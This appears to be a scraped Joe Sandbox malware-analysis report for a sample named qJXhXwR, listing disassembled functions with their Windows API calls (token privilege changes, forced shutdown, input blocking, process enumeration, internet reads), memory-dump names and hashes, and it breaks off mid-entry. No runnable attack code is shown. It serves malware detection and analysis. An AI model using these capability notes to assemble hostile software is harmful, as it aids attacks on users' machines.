Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *$.$.
API String ID: 2518042432-2112782162
Opcode ID: 12e9b60bd7894d2062c92085e89256868bb5cd1afb156a995e7c5da927ea5a3f
Instruction ID: 39c9781d99f538cff737010d66ebcbbd26c871d6a8827e8314b1a509e4cd6f9b
Opcode Fuzzy Hash: 12e9b60bd7894d2062c92085e89256868bb5cd1afb156a995e7c5da927ea5a3f
Instruction Fuzzy Hash: 0151F362F12A5586FB12EBA6E8501BDA3A0BB45FC8F964535DE1D17B98DE3CD0428320

Function 00007FF7A521D750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A520D5CC: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7A520D630
Part of subcall function 00007FF7A520D5CC: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A520D66F
Part of subcall function 00007FF7A520D5CC: GetLastError.KERNEL32 ref: 00007FF7A520D682

ExitWindowsEx.USER32 ref: 00007FF7A521D798
InitiateSystemShutdownExW.ADVAPI32 ref: 00007FF7A521D7C0
SetSystemPowerState.KERNEL32 ref: 00007FF7A521D7D2

Strings

SeShutdownPrivilege, xrefs: 00007FF7A521D763

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
String ID: SeShutdownPrivilege
API String ID: 2163645468-3733053543
Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
Instruction ID: 565e0956cb5d7548e2f466a5eb45a1838737478149397c8481d5cff8a6404d89
Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
Instruction Fuzzy Hash: F4119172B19A0282E724EB25EC4116FE261BF85B50F8A4135E54D83AFDEF3CD8468790

Function 00007FF7A51C5BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7A51C5C21
IsDebuggerPresent.KERNEL32 ref: 00007FF7A51C5C39
OutputDebugStringW.KERNEL32 ref: 00007FF7A51C5C4A

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7A51C5C43

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
Instruction ID: 2fa5eb7fa1c67974232655fddcb0a6585c67675a8bcd02af9a4c789eb19e9ffe
Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
Instruction Fuzzy Hash: 0F11607161674296E705EB21EA5037973A4FB55B45FC14134C64D426A4DF3DE074C720

Function 00007FF7A51A6D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7A51A6D33
GetProcAddress.KERNEL32 ref: 00007FF7A51A6D4B

Strings

kernel32.dll, xrefs: 00007FF7A51A6D2C
Wow64RevertWow64FsRedirection, xrefs: 00007FF7A51A6D41

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
Instruction ID: 6e532ff3905c999122f892f2a96332f93b79a78987450ba474cee2a58b892a71
Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
Instruction Fuzzy Hash: 11E0C9A5A16B0691EF1AAB20E8143B463A0BB19F48FC50434CA5D463B8EF7DE694C210

Function 00007FF7A5236320 Relevance: 6.3, APIs: 4, Instructions: 255COMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF7A523635F
CoUninitialize.OLE32 ref: 00007FF7A5236369

Part of subcall function 00007FF7A5214860: CoCreateInstance.OLE32 ref: 00007FF7A5214931

Part of subcall function 00007FF7A52203E8: VariantInit.OLEAUT32 ref: 00007FF7A5220437
Part of subcall function 00007FF7A52203E8: VariantCopy.OLEAUT32 ref: 00007FF7A5220443
Part of subcall function 00007FF7A52203E8: VariantClear.OLEAUT32 ref: 00007FF7A5220450

VariantInit.OLEAUT32 ref: 00007FF7A5236373
VariantClear.OLEAUT32 ref: 00007FF7A5236690

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
String ID:
API String ID: 2733932498-0
Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
Instruction ID: 79c9f996dee2d6598e453efab61b92a4dcd399664a0f8473f369588023795ef4
Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
Instruction Fuzzy Hash: B7B19266B06B5681EB15EF26D88067DA764FB49FE4F865031DF0E477A9CE38E440C320

Function 00007FF7A523EB34 Relevance: 6.2, APIs: 4, Instructions: 156processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A523EB92
Process32FirstW.KERNEL32 ref: 00007FF7A523EBA2
Process32NextW.KERNEL32 ref: 00007FF7A523EC9D
CloseHandle.KERNEL32 ref: 00007FF7A523ECAE

Part of subcall function 00007FF7A51C1AD0: CompareStringW.KERNEL32 ref: 00007FF7A51C1B1F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
String ID:
API String ID: 2000298826-0
Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
Instruction ID: 6ed3255ebaf9cb0affe3f3b38e6b36e0a243e1937b4182050fd8e9f37653535e
Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
Instruction Fuzzy Hash: 15717D36B19B4186E701EB21E4443AEB7A0FB89F98F824132EA4D07BA9DF7CD545C750

Function 00007FF7A5226428 Relevance: 4.6, APIs: 3, Instructions: 116fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF7A5226464
FindNextFileW.KERNEL32 ref: 00007FF7A52264B9
FindClose.KERNEL32 ref: 00007FF7A52264FB

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
Instruction ID: 2f5421c28c39a0fe8babfc2796a1e8199ec533afc7a8b0110a00519bc2446def
Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
Instruction Fuzzy Hash: 9B515A76609A4685DB14EF25E8802ACB760FB85F94F824232CB5E477B9CF7CE591C720

Function 00007FF7A52258C4 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00007FF7A52258E4
GetDiskFreeSpaceExW.KERNEL32 ref: 00007FF7A522595A
SetErrorMode.KERNEL32 ref: 00007FF7A52259BA

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
Instruction ID: ac8c121ccffbd5f867bf319a44321828caf44dbcad723f06dc52e0add75f27c5
Opcode Fuzzy Hash: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
Instruction Fuzzy Hash: B0316D72609A8582E711AF25E4802BEB760FB85F94F428131EB8E477B9DF7CD446CB10

Function 00007FF7A520D5CC Relevance: 4.6, APIs: 3, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51C4C68: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7A51C4C5C

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7A520D630
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A520D66F
GetLastError.KERNEL32 ref: 00007FF7A520D682

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 2278415577-0
Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
Instruction ID: 190629d9010c8468b7a028ce7d86c07bdc711ebe6979e8825030bc12100f3cf3
Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
Instruction Fuzzy Hash: 19219AB2A0AA8186D714AF26F84026AB7A0FB89F94F898435DB4C07768CF7CD556C714

Function 00007FF7A520D540 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF7A520D58C
CheckTokenMembership.ADVAPI32 ref: 00007FF7A520D5A3
FreeSid.ADVAPI32 ref: 00007FF7A520D5B4

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
Instruction ID: 67c329de36c1a2914555a2b5b1fa1000d4b44f5f417089b09a99be87ce432b06
Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
Instruction Fuzzy Hash: A30140736247818FE7108F20D8553AE77B0F76476EF410929E64986A98DB7DC158CB80

Function 00007FF7A51E2F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

., xrefs: 00007FF7A51E3198

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
Instruction ID: b6393dd0aadd43dbf86235ffd542c6aaa7da39c10734c29ec45da6ae90e35916
Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
Instruction Fuzzy Hash: 5F316B62B1569185EB21AF32F804676E690FB52FE0F858635FE6D07BECDE3CE4014210

Function 00007FF7A5232464 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

mouse_event.USER32 ref: 00007FF7A523250A

Part of subcall function 00007FF7A51C8E28: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51C8E4F

Strings

DOWN, xrefs: 00007FF7A52324E1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfomouse_event
String ID: DOWN
API String ID: 17014623-711622031
Opcode ID: 5b704a07574124c7e817457ac83024f80addd9552f4bff182079f39b1e753b8c
Instruction ID: 99fbe06708a9c49e023bffe0d74ec8fc0d0aba0850621106fbfaab4156c8c451
Opcode Fuzzy Hash: 5b704a07574124c7e817457ac83024f80addd9552f4bff182079f39b1e753b8c
Instruction Fuzzy Hash: F6218176A09A5681E618EB12E85027AA351FB86FA4F864030EE5D477F9DF7CE4818710

Function 00007FF7A5202BA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00007FF7A5202BA5

Strings

%.3d, xrefs: 00007FF7A5202BB1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: LocalTime
String ID: %.3d
API String ID: 481472006-986655627
Opcode ID: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
Instruction ID: e32b2d205ecd5f2339ca676e6480f9ed5f772a89f4428374bdcfcd9b1db892df
Opcode Fuzzy Hash: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
Instruction Fuzzy Hash: 34D0BDA1A1E522D1EA10EB50EC515BDE331BB52B15BD21032E50E414ECAFAAE904D720

Function 00007FF7A52271F4 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF7A5227227
FindClose.KERNEL32 ref: 00007FF7A522726A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
Instruction ID: 118bcb2e1a9bc52fe077addfb3035ddccd4e347fafd29dcae1706274b8db9b33
Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
Instruction Fuzzy Hash: B9116A72B0974182DB10AF26E48427CB760FB89FA0F468631DB6D077A9CF7CD4518710

Function 00007FF7A5223778 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF7A5237AD2), ref: 00007FF7A522379A
FormatMessageW.KERNEL32 ref: 00007FF7A52237C9

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
Instruction ID: d54ecdbb7b3caa69ff03603b950a5fd4bd46d40d6a208ca7d8c402697f7316eb
Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
Instruction Fuzzy Hash: CFF0C86170964292E7206B15F80067EE6A5FFDAB94F954134EB9D43BFDDE3CD4048B10

Function 00007FF7A520CCE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A520CD07
CloseHandle.KERNEL32 ref: 00007FF7A520CD1F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
Instruction ID: aadcab41479991cb8645192a2990e3c61a29381d2aa4b1180d2950d07b2c219b
Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
Instruction Fuzzy Hash: C3F0A7E5A1964182EB10EB21D8113789350EBDDF89F500531CE0D062B8CE6DC4468214

Function 00007FF7A522E87C Relevance: 1.6, APIs: 1, Instructions: 62filenetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51D48E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D4835

InternetReadFile.WININET ref: 00007FF7A522E8D8

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FileInternetRead_invalid_parameter_noinfo
String ID:
API String ID: 101623796-0
Opcode ID: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
Instruction ID: f91bf9e79b285c12ccba396d7b3d948ce79f302914b3734876bff4545ab0f952
Opcode Fuzzy Hash: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
Instruction Fuzzy Hash: 9521BFA6B0A68242FB60EB02E4403BDA354FB86F84FC55132DA8C07B99DF7CE501DB50

Function 00007FF7A5230A00 Relevance: 1.5, APIs: 1, Instructions: 23keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 00007FF7A5230A26

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
